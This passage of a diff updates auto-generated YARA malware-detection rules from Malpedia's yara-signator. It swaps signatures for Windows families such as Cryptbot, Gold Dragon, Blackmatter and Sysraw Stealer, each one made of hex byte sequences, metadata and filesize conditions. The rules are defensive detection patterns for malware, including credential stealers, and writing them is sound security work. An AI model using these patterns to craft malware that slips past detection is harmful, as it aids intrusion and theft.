+		$sequence_11 = { 8bc2 33d2 c1e804 f7f1 }
+		$sequence_12 = { 5e 5d 0fb7c1 5b }
+		$sequence_13 = { 8b442414 8b4c2414 33d2 f7f1 }
+		$sequence_14 = { 668b4c2410 5f 5e 5d }
+		$sequence_15 = { 0fb7c0 0fb7c9 33d2 f7f1 }
+		$sequence_16 = { 0fb7c1 0fb7ca 33d2 f7f1 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Noxplayer_Auto : FILE
+rule MALPEDIA_Win_Cryptbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52c2d792-4208-534f-9752-70135571b141"
+		id = "c80588a6-d143-5e79-9f26-778ded8c5ced"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.noxplayer_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptbot_auto.yar#L1-L256"
 		license_url = "N/A"
-		logic_hash = "39f8c0f5aeb72bc127d7da1eaa9ec4c91ef0378727bf180400ab0a14310839c7"
+		logic_hash = "a7dadf34e757866bd3311ff7a46036d085711fdb75a64818e7cbce0bd5b48b23"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125480,32 +125337,52 @@ rule MALPEDIA_Win_Noxplayer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 4883ec20 488b7968 488d05833a0300 488bd9 488901 4885ff }
-		$sequence_1 = { 33db 48391d???????? 488bf8 0f85d5000000 488d0d6fc70000 ff15???????? }
-		$sequence_2 = { 488d15757f0200 48894c2420 4885c9 7419 483901 750f 488b4108 }
-		$sequence_3 = { 488b742450 488bc3 4883c440 5b c3 488d542430 4533c9 }
-		$sequence_4 = { 49c7430801000000 8b530c 85d2 743e 660f1f440000 448d42ff 41d1f8 }
-		$sequence_5 = { eb06 488bd8 488b00 80782900 74e8 483b5908 }
-		$sequence_6 = { 4c8be8 0fb6465c 84c0 0f8553040000 4533e4 488b4e50 e8???????? }
-		$sequence_7 = { 742b 488bcf e8???????? 483b3d???????? 741a 488d05354c0200 483bf8 }
-		$sequence_8 = { 4c8d4204 e8???????? eb78 488b4f50 498bd4 488b01 ff5040 }
-		$sequence_9 = { 41390424 745d 807b1d00 754a 488b4310 80781d00 7520 }
+		$sequence_0 = { 33c0 85ed 0f94c0 8be8 }
+		$sequence_1 = { 760f b990ec0000 e8???????? e9???????? }
+		$sequence_2 = { e9???????? b949dc0000 e9???????? b944dc0000 e9???????? b964dc0000 }
+		$sequence_3 = { 7f0a 83fd1e 7f05 83ff13 }
+		$sequence_4 = { eb0c b99fed0000 e8???????? 8907 }
+		$sequence_5 = { 33c0 eb0a b917d90000 e8???????? }
+		$sequence_6 = { 7511 b9d7d80000 e8???????? 8907 }
+		$sequence_7 = { 750f b955960100 e8???????? e9???????? }
+		$sequence_8 = { 7414 3c7a 7508 8b4610 803874 7408 41 }
+		$sequence_9 = { 83caff 8bcf e8???????? 83caff }
+		$sequence_10 = { 7419 8b542408 83fa01 7c10 0fbf4846 }
+		$sequence_11 = { 744e 0fb74802 83e103 3bcb }
+		$sequence_12 = { 7508 85f6 7404 c6464101 5e c3 }
+		$sequence_13 = { 1ac9 2403 80e110 8ad1 3c02 7509 }
+		$sequence_14 = { 7505 89410c 8bc1 ffb42484000000 }
+		$sequence_15 = { 85c0 742c 8bd6 8bcb }
+		$sequence_16 = { e8???????? 8b5720 8bce e8???????? 8b5724 }
+		$sequence_17 = { 8b4d34 894c245c dd85b8fbffff dd5c2454 }
+		$sequence_18 = { 014710 83571400 83c301 8bbe4c010000 8355fc00 }
+		$sequence_19 = { 8b4d18 8901 895104 e9???????? }
+		$sequence_20 = { 015e58 8bd7 8b4e60 83565c00 }
+		$sequence_21 = { 015f28 8bc2 13472c 89472c }
+		$sequence_22 = { 8b4d14 898d38ffffff 8b8580000000 898534ffffff }
+		$sequence_23 = { 8b4d20 894c2468 8b4d5c 894c2464 }
+		$sequence_24 = { 8b4d18 8b09 81c1fc030000 8b448808 }
+		$sequence_25 = { 014e10 134614 837de000 894614 }
+		$sequence_26 = { 8b4d24 894c247c dd85b0fbffff dd5c2474 }
+		$sequence_27 = { 8b4d28 898d30ffffff 8b958c000000 89952cffffff }
+		$sequence_28 = { 018330af0100 8b45d8 85c0 7416 }
+		$sequence_29 = { 8b4d18 8b09 83c101 81c1fc030000 }
 
 	condition:
-		7 of them and filesize < 742400
+		7 of them and filesize < 17138688
 }
-rule MALPEDIA_Win_Beatdrop_Auto : FILE
+rule MALPEDIA_Win_Gold_Dragon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7fbd33c7-5e5a-5775-9e75-19a0333e1225"
+		id = "991ba939-2d9f-52cd-813d-6925dfb8d9c9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beatdrop_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gold_dragon_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "b158347b6f43a3a62739d069377789597416764bca18afcdaffdbcf2df1f7202"
+		logic_hash = "1d3ddf008eb509566d50c074a1778063d25aa540d5f914350cb60f472b9c159b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125519,32 +125396,32 @@ rule MALPEDIA_Win_Beatdrop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 47339c8d000c0000 413384bd00080000 4133948d00080000 44335d60 0fb6d8 0fb6cc 4189d1 }
-		$sequence_1 = { 33557c 413384bd000c0000 4489cf 334578 41c1eb18 }
-		$sequence_2 = { 443385a4000000 450fb6d2 4733849500040000 450fb6d7 }
-		$sequence_3 = { 4c3b6610 740f 4c89e1 e8???????? }
-		$sequence_4 = { 4409c8 4133470c 448b7c2418 89aef8000000 }
-		$sequence_5 = { 47338495000c0000 4189c2 0fb6cd 41c1ea10 443385a4000000 450fb6d2 4733849500040000 }
-		$sequence_6 = { c1ea10 338590000000 458b74b500 4489c1 0fb6d2 }
-		$sequence_7 = { 41c1ef18 0fb6cd 44897c2418 894c2404 89c1 0fb6c0 c1e918 }
-		$sequence_8 = { c1e818 4489d1 450fb6da 418b448500 41338495000c0000 }
-		$sequence_9 = { 4133948c00080000 89c1 0fb6ef 440fb6c2 }
+		$sequence_0 = { 8890e0924000 eb1c f6c202 7410 8088????????20 8a9405ecfcffff }
+		$sequence_1 = { 8bc8 83e01f c1f905 8d04c0 8b0c8d00954000 8d44810c 50 }
+		$sequence_2 = { 85c0 a3???????? 0f84ad060000 8b35???????? 68???????? }
+		$sequence_3 = { 8bf1 8bc1 c1fe05 83e01f 8b34b500954000 8d04c0 8b0486 }
+		$sequence_4 = { 41 8079ff00 0f8547ffffff 8bc6 8088e193400008 }
+		$sequence_5 = { 8d8560ffffff 68???????? 50 e8???????? ffb64c834000 8d8560ffffff 50 }
+		$sequence_6 = { 51 ffd6 85c0 a3???????? 0f84dd030000 8b15???????? }
+		$sequence_7 = { 50 ffd6 85c0 a3???????? 0f8478060000 }
+		$sequence_8 = { 83e01f 8b0c8d00954000 8d04c0 8d0481 8b4dfc }
+		$sequence_9 = { 68???????? 50 ffd6 85c0 a3???????? 0f84d8050000 8b0d???????? }
 
 	condition:
-		7 of them and filesize < 584704
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Taleret_Auto : FILE
+rule MALPEDIA_Win_Dustpan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "09104a61-10e4-51be-8fcd-72ca4b899ef9"
+		id = "c9c878b8-cad8-5a19-8f4e-78ad38029b7f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taleret_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustpan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dustpan_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "4f3dbb090232b14fe9d8fb1c04016f4bef98cd25096fea3fc24c423d5e08c994"
+		logic_hash = "5224f428476ca9b9e044abefc44ce9a53e06974708bc3448eb44f67994867ab4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125558,32 +125435,32 @@ rule MALPEDIA_Win_Taleret_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89442430 8bf8 8bc1 8bf5 55 c1e902 f3a5 }
-		$sequence_1 = { 85c0 741b 8b4c241c 51 ffd3 8b542410 }
-		$sequence_2 = { 51 68???????? 52 e8???????? 50 8d4c2414 c644243802 }
-		$sequence_3 = { 8d4c242c c78424a8030000ffffffff e8???????? 56 e8???????? 83c404 8b7c2410 }
-		$sequence_4 = { 85ff 896c2420 7e2a 8b4c2440 8d442420 }
-		$sequence_5 = { 85c0 0f84a6000000 50 51 }
-		$sequence_6 = { 50 e8???????? 8d8eb0010000 8d542434 51 68???????? 52 }
-		$sequence_7 = { 51 ffd6 85c0 7536 ff15???????? 83f87a }
-		$sequence_8 = { ff15???????? 8bd8 3bde 895c2420 750d 5f }
-		$sequence_9 = { 8b4c2424 c644310100 8d4c2430 e8???????? 50 }
+		$sequence_0 = { 4533c0 4c891d???????? e8???????? 488d0d32010000 4883c420 5b e9???????? }
+		$sequence_1 = { b9ff000000 e8???????? 488bfb 4803ff 4c8d2d45eb0000 }
+		$sequence_2 = { 488d0d19a80100 33d2 c744242800000008 895c2420 ffd0 488b4d00 4833cc }
+		$sequence_3 = { 4c8be7 4c8bf7 49c1fe05 4c8d3dffb60000 }
+		$sequence_4 = { 488d05fb0a0100 eb04 4883c014 8918 e8???????? 4c8d15e30a0100 4885c0 }
+		$sequence_5 = { 7440 66448923 8a45d8 4b8b8cf8e0d00100 88443109 8a45d9 }
+		$sequence_6 = { e9???????? 488d0d45010000 e9???????? 4883ec28 488d0d12910000 e8???????? 488d0d39010000 }
+		$sequence_7 = { 488bca 48c1f905 4c8d0533760100 83e21f }
+		$sequence_8 = { 4889442420 e8???????? 488d8380000000 803800 741d 4c8d0df2bc0000 41b802000000 }
+		$sequence_9 = { 894704 e9???????? 488d0d351f0100 48394c2458 7427 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 282624
 }
-rule MALPEDIA_Win_Lechiket_Auto : FILE
+rule MALPEDIA_Win_Bottomloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "08dac53f-197a-5416-a7db-8f3c1de4ec77"
+		id = "bdd8fe32-22cd-5060-a395-421a392e2bd1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lechiket"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lechiket_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bottomloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bottomloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fc33b6d2e9f07c53a0ef858e0194b9a6cf5341ef888af832ba9746c5214aaca1"
+		logic_hash = "b7681a0b4dfc773cac57468dbf0ac81e795dbff01a4fc0df233a09abd9d3252c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125597,32 +125474,32 @@ rule MALPEDIA_Win_Lechiket_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 ff15???????? 3d02010000 7519 56 ff15???????? 53 }
-		$sequence_1 = { 57 eb4b 8a16 80fac0 }
-		$sequence_2 = { 740f 47 3b7d0c 76d6 33c0 }
-		$sequence_3 = { 51 ff7518 8365fc00 ff7514 8d4510 }
-		$sequence_4 = { c786????????1a000000 8a550b 8bcb ff15???????? 5f 5e }
-		$sequence_5 = { ff750c e8???????? 85c0 0f84bdfdffff 8b4df8 8d7c0f01 8d480a }
-		$sequence_6 = { 85d2 7505 b80d0000c0 85ff 5e 740c 85c0 }
-		$sequence_7 = { e8???????? 84c0 7504 fec0 eb1c 53 8bce }
-		$sequence_8 = { 33f6 39750c 57 7613 ff15???????? 88843500ffffff 46 }
-		$sequence_9 = { 8945f8 8d45d0 6808070000 50 }
+		$sequence_0 = { e8???????? 488d3537d60700 488975c8 48c745c00e000000 488d4dc0 e8???????? 488d051bd60700 }
+		$sequence_1 = { e8???????? 4889c6 488d0579400600 488945c8 48c745c016000000 488d55c0 48899578feffff }
+		$sequence_2 = { 48897de8 e8???????? 4889c7 4885ff 746f 488d0ddcda0700 e8???????? }
+		$sequence_3 = { 4889bdd8fdffff 8b05???????? 65488b0c2558000000 488b14c1 bbf0090000 4c8b441a08 4c0b041a }
+		$sequence_4 = { 488975f8 488d55f0 488d8d70ffffff e8???????? 488d8d70ffffff e8???????? 488b9d60ffffff }
+		$sequence_5 = { ba43010000 488d0d57dc0700 e8???????? 4d8b542408 410fb63412 eb05 beff000000 }
+		$sequence_6 = { 488d0dc5800b00 4883ec20 e8???????? 4883c420 48898550ffffff 48899558ffffff 4c8b8550ffffff }
+		$sequence_7 = { c3 48895518 488d058b140b00 488945f8 48c745f027000000 488d55f0 8bce }
+		$sequence_8 = { 7442 4883fa02 7472 e9???????? 4d8bc4 488d5520 488d8db0feffff }
+		$sequence_9 = { 4531c0 ba86100000 488d0db8fd0500 e8???????? 4a8d0c0b 488b55f8 e8???????? }
 
 	condition:
-		7 of them and filesize < 331776
+		7 of them and filesize < 1955840
 }
-rule MALPEDIA_Win_Catchamas_Auto : FILE
+rule MALPEDIA_Win_Scanpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b847b40-e879-5e63-94f7-59f1fcf23399"
+		id = "ea54b41f-0e3e-59d0-9d34-b01116c8bd16"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.catchamas_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scanpos_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "cfbaa74a75beb0fd45948dc9b52c0976cafb521d914a50e8e394b7e70fd341de"
+		logic_hash = "d918dbccd253554c0b76ec27fc4d9c167e1c0563dfe60b916ccc540524fa3716"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125636,32 +125513,32 @@ rule MALPEDIA_Win_Catchamas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 84c9 75f1 833d????????ff 740c 8db42470100000 }
-		$sequence_1 = { 40 e8???????? 85db 7411 }
-		$sequence_2 = { 8bf1 897c2418 c644241c00 e8???????? 68???????? }
-		$sequence_3 = { 83d200 8955d0 7554 83f8ff }
-		$sequence_4 = { 6a14 81e300800000 ffd7 83e001 33c9 8bff baba000000 }
-		$sequence_5 = { ff15???????? 56 8be8 55 53 }
-		$sequence_6 = { 6a00 52 c745dc00000000 e8???????? 8b45dc 6a00 8d4de8 }
-		$sequence_7 = { 8b45e0 7409 e8???????? 8bfc eb32 83c9ff }
-		$sequence_8 = { 66894e14 5e 8b8c2404080000 33cc e8???????? }
-		$sequence_9 = { e8???????? 682000cc00 53 53 56 57 55 }
+		$sequence_0 = { 64a300000000 8b4508 33d2 c745e80f000000 8955e4 }
+		$sequence_1 = { 3ad3 75f9 2bc1 8bd0 }
+		$sequence_2 = { e8???????? 83c404 8b0d???????? 8939 8b15???????? 893a }
+		$sequence_3 = { 8d85e8feffff 50 51 68???????? 68???????? e8???????? 83c40c }
+		$sequence_4 = { 53 52 ffd0 3bc3 7508 3bd7 }
+		$sequence_5 = { e9???????? 8db5acfeffff e9???????? 8b542408 8d420c 8b8a8cfeffff 33c8 }
+		$sequence_6 = { e8???????? 03c8 8b4608 2bc2 3bc8 }
+		$sequence_7 = { 50 8d45f4 64a300000000 8b4508 8918 8b0b }
+		$sequence_8 = { 3bfb 0f82b9fdffff 837de810 720c 8b4dd4 }
+		$sequence_9 = { 6aff 68???????? 53 ff15???????? 85c0 0f95c3 837dcc10 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Mofksys_Auto : FILE
+rule MALPEDIA_Win_Linseningsvr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9191181-2227-59a8-bd61-7f1cd7036f61"
+		id = "68c65b63-e40e-59ed-9f87-895cfc0dec94"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mofksys_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.linseningsvr_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "8771c5394499398335ed69edffdfbaf6278241ddeb464ebd5620f11ca11db156"
+		logic_hash = "e8f369f7ec61592e2a3b3fecf4bc420063f67a74461c185ad8f3d77705dffe45"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125675,32 +125552,32 @@ rule MALPEDIA_Win_Mofksys_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 50 ff15???????? 51 d91c24 ff15???????? 8bd0 }
-		$sequence_1 = { c1e003 eb0c ff15???????? 8b8dfcfeffff 8b590c 8b0c03 03d8 }
-		$sequence_2 = { c78558ffffff00000000 c745fcab000000 8b8d6cffffff 83c128 898d54ffffff c745fcac000000 ba???????? }
-		$sequence_3 = { ff15???????? 8bd0 8d4db0 ff15???????? 8d8d50fdffff ff15???????? c745fc07000000 }
-		$sequence_4 = { 8d4db4 ff15???????? e9???????? c745fc0a000000 833d????????00 }
-		$sequence_5 = { 83c410 6685f6 7413 668b0d???????? 51 ff15???????? e9???????? }
-		$sequence_6 = { 50 8b4dc8 51 6a01 ff15???????? 50 8b55a4 }
-		$sequence_7 = { c78540ffffff7ca44000 c78538ffffff08000000 ff15???????? 8b4dc0 68???????? 51 ffd7 }
-		$sequence_8 = { 50 8b5508 8b02 50 e8???????? ffd7 8b4da4 }
-		$sequence_9 = { 52 ff15???????? 8bd0 8d4dcc ff15???????? c745fc27000000 8b4dc8 }
+		$sequence_0 = { 33c0 8dbc24dd090000 c644241000 f3ab 66ab aa }
+		$sequence_1 = { 8d542464 6a01 52 89442464 894c2468 e8???????? }
+		$sequence_2 = { 8dbc24dd090000 c644241000 f3ab 66ab }
+		$sequence_3 = { 8b0485c08d4000 03c6 8a5004 f6c201 }
+		$sequence_4 = { e8???????? 57 e8???????? 83c418 8d44244c }
+		$sequence_5 = { 742e 85f6 7419 0fb6da f683818c400004 }
+		$sequence_6 = { c705????????01000000 50 a3???????? e8???????? 8db6bc884000 }
+		$sequence_7 = { e8???????? 83c40c c3 53 56 be???????? 57 }
+		$sequence_8 = { 8a4c3c4c 51 68???????? e8???????? 83c408 }
+		$sequence_9 = { e8???????? 83c404 ebc2 8b0d???????? 68???????? 51 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 81360
 }
-rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE
+rule MALPEDIA_Win_Ranbyus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3fa79262-0c02-5cc9-a3a6-873095c530cc"
+		id = "54de3fda-fe2a-5da1-b66d-8d3ced40b618"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flying_dutchman_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ranbyus_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "d533074e01136dd41c79c95680e27071c66cb57e7811b397b8be14c8164a2230"
+		logic_hash = "82fa28b1862a5e88eb758d7dfc3440cfe7dde7bd4fcf686642cc7b0948f4efb1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125714,32 +125591,32 @@ rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 899c2480400000 897c2418 3bc7 7d42 8b5c2410 e8???????? 8b5c2414 }
-		$sequence_1 = { 8b5104 895008 8b09 894804 833801 }
-		$sequence_2 = { 83a588fdffff00 899d8cfdffff c68578fdffff00 c645fc05 ff15???????? 50 8d85e8fdffff }
-		$sequence_3 = { 8b8574f7ffff 8985c0fdffff 8b8578f7ffff 8985c4fdffff 6804010000 8d858cf9ffff 50 }
-		$sequence_4 = { 83e800 747a 48 7459 48 0f858c000000 8b3d???????? }
-		$sequence_5 = { ff7508 e8???????? 8bd8 53 57 }
-		$sequence_6 = { 75f2 8b35???????? 57 57 ffd6 898570ffffff 3bc7 }
-		$sequence_7 = { 663bcf 75ed e9???????? 83f806 751a 33c0 }
-		$sequence_8 = { c1e606 03348560e90110 c745e401000000 33db 395e08 }
-		$sequence_9 = { 3bf3 7405 e8???????? 6a05 ff15???????? 399d68deffff }
+		$sequence_0 = { 68???????? e8???????? 83c40c 33c0 eb03 83c8ff 5f }
+		$sequence_1 = { 59 85ff 743e 56 6a01 }
+		$sequence_2 = { 83661800 33c0 5e c3 56 }
+		$sequence_3 = { 89460c 8b06 59 894604 }
+		$sequence_4 = { 55 8d6c2490 81ec28010000 56 }
+		$sequence_5 = { 3b4c2404 7504 83601800 33c0 40 eb11 50 }
+		$sequence_6 = { 6801200000 e8???????? 8bf0 59 }
+		$sequence_7 = { 83c605 e9???????? 47 e9???????? 0fb64e01 }
+		$sequence_8 = { e8???????? 85c0 7504 83c8ff c3 c7402401000000 33c0 }
+		$sequence_9 = { c706???????? eb07 8bce e8???????? 837e0400 75f3 }
 
 	condition:
-		7 of them and filesize < 276480
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Blackmatter_Auto : FILE
+rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f72bfe88-212a-5b08-bbca-50aa064e9cc7"
+		id = "c0b55ef6-5e72-5427-8051-b4c3cd8766ea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackmatter_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sysraw_stealer_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "e535a5032543c492ff373af34088a44c3884afdd41efbf279f3f7738c128e9a0"
+		logic_hash = "c61c4a8b05627678a7ba0afb4e01a7aec8181a910b716ed57582ec5bcddd612c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125753,32 +125630,32 @@ rule MALPEDIA_Win_Blackmatter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? ebe7 837dd400 7408 ff75d4 }
-		$sequence_1 = { 807eff2e 7502 eb02 eb05 }
-		$sequence_2 = { 8d45f4 50 ff15???????? 83c40c 6a0a }
-		$sequence_3 = { 0f858c000000 83bdacfdffff00 7509 83bdb0fdffff00 747a }
-		$sequence_4 = { 740e ff75f0 ff15???????? 5b 8be5 }
-		$sequence_5 = { ff15???????? 85c0 753a 64813d34000000b7000000 }
-		$sequence_6 = { c745f000000000 ff7508 ff15???????? 83c404 85c0 0f848a010000 }
-		$sequence_7 = { 66ab 648b1d30000000 ff731c ff15???????? 8b7310 8d4638 ff35???????? }
-		$sequence_8 = { 85f6 745e 687c010000 56 ff75e8 ff15???????? }
-		$sequence_9 = { 85c0 7510 807eff2d 7406 807eff2e 7502 eb02 }
+		$sequence_0 = { ffd3 8bd0 8d8decfeffff ffd6 8b4d90 8d9580feffff 83c114 }
+		$sequence_1 = { 56 ff512c 8b55bc 8b06 8d8d54feffff }
+		$sequence_2 = { 33c9 8955bc 894de4 ba3f000000 }
+		$sequence_3 = { 6a0d 57 56 ff5238 }
+		$sequence_4 = { 8bf8 ffd6 3bfb 7472 }
+		$sequence_5 = { 8b8df8feffff 8b85f4feffff 898d24feffff 8b8df0feffff 898d1cfeffff }
+		$sequence_6 = { 8b550c 8b06 51 52 56 }
+		$sequence_7 = { 2bd7 6a00 42 83ec08 895590 db4590 }
+		$sequence_8 = { 8bd0 8b45d4 51 f7da }
+		$sequence_9 = { 50 ffd3 8bd0 8d8d24ffffff ffd6 }
 
 	condition:
-		7 of them and filesize < 194560
+		7 of them and filesize < 1540096
 }
-rule MALPEDIA_Win_Jupiter_Auto : FILE
+rule MALPEDIA_Win_Kuaibu8_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75f69a27-2335-5e55-aba0-ab6c4b24c511"
+		id = "755c9fef-12d3-5450-97c1-5338be93504a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jupiter_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kuaibu8_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "9a9545049cbc95230bffe2c6ee7b65da4bdadff47104616baed37c8cd6306b50"
+		logic_hash = "fc318523e53f24e8818ee766d5be4e6f49732099f739761d424c7624b095d7ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125792,32 +125669,32 @@ rule MALPEDIA_Win_Jupiter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c605????????01 66c705????????0101 c605????????01 c605????????01 }
-		$sequence_1 = { 8a4147 884104 8a4146 884105 8b4144 c1f808 884106 }
-		$sequence_2 = { 884104 8a4146 884105 8b4144 c1f808 884106 8a4144 }
-		$sequence_3 = { 8a4146 884105 8b4144 c1f808 884106 }
-		$sequence_4 = { c605????????01 c605????????01 66c705????????0101 c605????????01 }
-		$sequence_5 = { 8a4147 884104 8a4146 884105 }
-		$sequence_6 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 c605????????01 }
-		$sequence_7 = { 884104 8a4146 884105 8b4144 }
-		$sequence_8 = { 52 52 6802000000 6803000000 }
-		$sequence_9 = { 8a4146 884105 8b4144 c1f808 }
+		$sequence_0 = { ff35???????? b902000000 e8???????? 83c408 8945e0 8b45e0 50 }
+		$sequence_1 = { 83c404 c1e002 03d8 895db4 8b5de8 e8???????? b804000000 }
+		$sequence_2 = { 6a10 52 56 6689442416 e8???????? }
+		$sequence_3 = { 7409 53 e8???????? 83c404 8b5de8 e8???????? }
+		$sequence_4 = { 895dbc e8???????? 894db8 8b7dbc c70701000000 83c704 8bc1 }
+		$sequence_5 = { 83c404 58 8945f4 8965ec 8d45f0 50 8b45f4 }
